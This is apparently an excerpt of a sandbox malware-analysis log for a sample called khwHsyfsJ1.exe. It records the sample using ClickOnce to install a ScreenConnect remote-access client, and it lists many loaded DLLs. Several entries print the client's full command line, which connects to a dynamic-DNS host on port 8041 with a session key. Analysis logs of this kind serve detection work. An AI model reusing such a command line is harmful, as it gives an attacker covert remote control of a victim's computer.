                  Source: unknownProcess created: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe "C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=kjh231a.zapto.org&p=8041&s=41bb451f-21e9-4165-b8b1-29146c1a400a&k=BgIAAACkAABSU0ExAAgAAAEAAQAFiJkYSsHWAiMLqCRmzzktgQckyG3TGgm6yPTLawNtNX6q1gr57JH4PrLfClMTmwPp16%2ftpUu72MJPhrP9Fe%2fDAOLI7IxssEnqHo0cK7GF8605xW1%2b29YYv7Gp%2f%2bRVnS8EXpyfNuusFYa%2bCoXawQboJM2Gi1VXFl4XcMGGJmYswsgo9qU%2fBqW3jX3LRGSRskHQDuJYQ8zNUvX1ZvvvtewO8gfRa7Z6WeC1pOnkHykQZ7ux8aNy9iCaTKjcx7FnTu1T7GRag6eNtt4weTuPK2uLu2HYzL%2fVKjjkmkP1xXy2lhSPvloy810giaMzeQQElR11NNJ7O%2bcRI%2b4xi9%2bIANXb&r=&i=Untitled%20Session" "1"
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe" "RunRole" "22550ff7-91dc-46b5-a75f-0870a9ece610" "User"
                  Source: C:\Users\user\Desktop\khwHsyfsJ1.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe"Jump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 652 -ip 652Jump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 652 -s 844Jump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe "C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=kjh231a.zapto.org&p=8041&s=41bb451f-21e9-4165-b8b1-29146c1a400a&k=BgIAAACkAABSU0ExAAgAAAEAAQAFiJkYSsHWAiMLqCRmzzktgQckyG3TGgm6yPTLawNtNX6q1gr57JH4PrLfClMTmwPp16%2ftpUu72MJPhrP9Fe%2fDAOLI7IxssEnqHo0cK7GF8605xW1%2b29YYv7Gp%2f%2bRVnS8EXpyfNuusFYa%2bCoXawQboJM2Gi1VXFl4XcMGGJmYswsgo9qU%2fBqW3jX3LRGSRskHQDuJYQ8zNUvX1ZvvvtewO8gfRa7Z6WeC1pOnkHykQZ7ux8aNy9iCaTKjcx7FnTu1T7GRag6eNtt4weTuPK2uLu2HYzL%2fVKjjkmkP1xXy2lhSPvloy810giaMzeQQElR11NNJ7O%2bcRI%2b4xi9%2bIANXb&r=&i=Untitled%20Session" "1"Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe" "RunRole" "22550ff7-91dc-46b5-a75f-0870a9ece610" "User"
                  Source: C:\Users\user\Desktop\khwHsyfsJ1.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\khwHsyfsJ1.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\khwHsyfsJ1.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\khwHsyfsJ1.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\khwHsyfsJ1.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\khwHsyfsJ1.exeSection loaded: dfshim.dllJump to behavior
                  Source: C:\Users\user\Desktop\khwHsyfsJ1.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\khwHsyfsJ1.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\khwHsyfsJ1.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\Desktop\khwHsyfsJ1.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\khwHsyfsJ1.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\khwHsyfsJ1.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\khwHsyfsJ1.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\khwHsyfsJ1.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dfshim.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dwrite.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: textshaping.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: textinputframework.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: coreuicomponents.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: cryptnet.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: cabinet.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: uiautomationcore.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wersvc.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: windowsperformancerecordercontrol.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: weretw.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wer.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: faultrep.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dbghelp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dbgcore.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wer.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wlidsvc.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: clipc.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msxml6.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wtsapi32.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: winsta.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: gamestreamingext.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msauserext.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: tbs.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptnet.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: elscore.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: elstrans.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptngc.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: devobj.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: version.dllJump to behavior
